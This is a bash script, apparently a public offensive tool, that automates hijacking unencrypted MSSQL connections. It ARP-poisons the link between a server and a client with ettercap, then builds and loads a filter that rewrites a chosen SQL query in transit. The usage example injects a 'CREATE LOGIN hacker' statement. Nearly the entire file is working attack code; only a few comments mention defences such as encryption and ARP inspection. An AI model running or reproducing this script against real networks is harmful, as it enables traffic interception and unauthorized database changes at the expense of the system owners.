| 1 | #!/bin/bash | |
| 2 | # | |
| 3 | #################################################################### | |
| 4 | # | |
| 5 | # Written by Rick Osgood | |
| 6 | # | |
| 7 | # This script is designed to automate the process of hijacking an | |
| 8 | # MSSQL database connection. This script can be used to perform a | |
| 9 | # MITM attack between two IP addresses using ettercap and ARP | |
| 10 | # spoofing. You also submit an original SQL query and a new SQL | |
| 11 | # query. The script will create, compile, and load an ettercap | |
| 12 | # filter to replace the original SQL string with your new one. | |
| 13 | # This should work on any MSSQL connection that is not encrypted. | |
| 14 | # | |
| 15 | #################################################################### | |
| 16 | ||
args=("$@") # array to store command line arguments; the parser below walks it by index
# Set variable defaults.
# ServerIP, ClientIP and FileName use the literal string "NULL" as a
# "not supplied" sentinel; the checks after argument parsing test for it.
SqlPort=1433
ServerIP="NULL"
ClientIP="NULL"
FileName="NULL"
| 24 | ||
# Help function
#######################################
# Print the usage text.
# Globals:   none
# Arguments: none
# Outputs:   usage line, an example invocation and a per-flag summary on stdout
# Returns:   0 (status of the last echo)
#######################################
print_help(){
  # The next two echo strings deliberately span two source lines each;
  # the embedded newline is part of the printed text.
  echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP]
-c [SQL Client IP]"
  echo ""
  echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L
OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"
  echo ""
  echo "This script creates an ettercap filter that will identify a SQL string"
  echo "and replace it with a new string. The script will then compile the filter"
  echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
  echo "spoofing attack against the specified IP addresses automatically. All you"
  echo "have to do is sit back and wait for the original query to be submitted."
  echo ""
  echo " --help"
  echo " Show this message."
  echo " -o"
  echo " Specify the original SQL string to be replaced."
  echo " -i"
  echo " Specify the new SQL string to be injected. This string must not"
  echo " longer than the original query string."
  echo " -s"
  echo " Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"
  echo " -c"
  echo " Specify the SQL cient IP for ARP poison attack."
  echo " -f"
  echo " Specify the output filename for the ettercap filter."
  echo " -p"
  echo " Optional. Specifiy the MSSQL traffic port. Defaults to 1433."
}
| 55 | ||
# If not enough arguments then quit
# ($# is the raw argument count, flags and their values together.)
if [ $# -lt "4" ]; then
  print_help
  exit 1
fi

COUNTER=0 # Count from zero to number of arguments
# Walk the args array by index. Each value-taking flag advances COUNTER once
# to consume its operand; the increment at the bottom of the loop body then
# steps past the flag itself.
while [ $COUNTER -lt $# ]; do
  if [ "${args[$COUNTER]}" == "--help" ]; then
    print_help
    exit 0

  elif [ "${args[$COUNTER]}" == "-o" ]; then
    COUNTER=$(($COUNTER+1))
    OldQuery=${args[$COUNTER]}

  elif [ "${args[$COUNTER]}" == "-i" ]; then
    COUNTER=$((COUNTER+1))
    NewQuery=${args[$COUNTER]}

  elif [ "${args[$COUNTER]}" == "-s" ]; then
    COUNTER=$((COUNTER+1))
    ServerIP=${args[$COUNTER]}

  elif [ "${args[$COUNTER]}" == "-c" ]; then
    COUNTER=$((COUNTER+1))
    ClientIP=${args[$COUNTER]}

  elif [ "${args[$COUNTER]}" == "-f" ]; then
    COUNTER=$((COUNTER+1))
    FileName=${args[$COUNTER]}

  elif [ "${args[$COUNTER]}" == "-p" ]; then
    COUNTER=$((COUNTER+1))
    SqlPort=${args[$COUNTER]}

  else
    # Anything that is not a recognised flag (including a stray value) is fatal.
    echo "Error: Unknown argument \"${args[$COUNTER]}\""
    echo ""
    print_help
    exit 1
  fi

  COUNTER=$(($COUNTER+1))
done;
| 101 | ||
# Is anything missing?
# Only the two IPs and the filter filename are compared against the "NULL"
# sentinel set in the defaults; -o, -i and -p are not checked here.
if [ "$ServerIP" == "NULL" ]; then
  echo "You must specify server IP!"
  exit 1

elif [ "$ClientIP" == "NULL" ]; then
  echo "You must specify client IP!"
  exit 1

elif [ "$FileName" == "NULL" ]; then
  echo "You must specify the file name for the ettercap filter!"
  exit 1
fi
| 115 | ||
# Calculate length of injected SQL query
# `wc -m` also counts the newline that echo appends, hence the -1 below.
length2=`echo $NewQuery | wc -m`
length2=$((length2 - 1))
echo "New string is $length2 bytes"

# Calculate length of original SQL query
length1=`echo $OldQuery | wc -m`
length1=$((length1 - 1))
echo "Original string is $length1 bytes"

# What's the difference?
difference=$((length1 - length2))
echo "Difference is $difference bytes"

# If the new string is too long it won't work
# (the replacement has to occupy exactly the bytes of the original; the
#  padding below space-fills a shorter replacement up to that length)
if [ $difference -lt 0 ]; then
  echo ""
  echo "New SQL query is longer than original! Quitting..."
  exit 0
fi

# Build a run of $difference spaces and append it to the new query.
temp=""
for i in `seq 1 $difference`;
do
  temp="$temp "
done
PaddedQuery="$NewQuery$temp"
echo "PaddedQuery is \"$PaddedQuery\""
echo ""
| 145 | ||
IFS=$'\n' # change separator to newline only. Required or the for loop skips spaces

echo "Converting original query to hex..."
# Convert original query to hex string with NULL padding (How it appears over the wire)
# sed splits the query one character per line; for each character the loop
# appends "\x" + the first byte's hex from `hexdump -C` (second field of its
# first output line) + "\x00". The author's comment says this NUL-interleaved
# form is what appears on the wire; presumably the protocol carries the text
# as 2-byte characters — not verified here.
OldQueryHex=""
for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')
do
  OldQueryHex="$OldQueryHex\x"
  temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}`
  OldQueryHex="$OldQueryHex$temp"
  OldQueryHex="$OldQueryHex\x00"
done

echo "Converting new query to hex..."
# Convert new query to hex string now.
# Same per-character encoding as above, applied to the space-padded replacement
# so both hex strings describe the same number of bytes.
NewQueryHex=""
for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')
do
  NewQueryHex="$NewQueryHex\x"
  temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}`
  NewQueryHex="$NewQueryHex$temp"
  NewQueryHex="$NewQueryHex\x00"
done
| 169 | ||
echo "Writing ettercap filter now..."

# Start writing actual ettercap filter file
# The generated filter matches TCP segments to $SqlPort, searches the
# payload for the original query's byte pattern and swaps in the padded
# replacement's bytes. It is a plain byte search on cleartext payload,
# which is why the file header limits it to unencrypted connections:
# requiring encrypted connections on the database server removes the
# match, and ARP-spoofing detection on the network (e.g. dynamic ARP
# inspection) catches the interception step itself.
echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
echo " msg(\"SQL traffic discovered\");" >> $FileName
echo " if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
echo " msg(\"Found our string!\");" >> $FileName
echo " replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName
echo " msg(\"...and replaced it :)\");" >> $FileName
echo " }" >> $FileName
echo "}" >> $FileName

# Execute etterfilter to create the compiled filter
# Output goes to "$FileName.ef" next to the filter source.
etterfilter $FileName -o $FileName.ef

# Execute ettercap and load the filter
# -M ARP with the two targets is the ARP-poisoning step described in the
# header; the compiled filter is applied to the intercepted stream.
ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//

# Printed whenever ettercap returns, regardless of its exit status.
echo ""
echo "Completed Successfully!"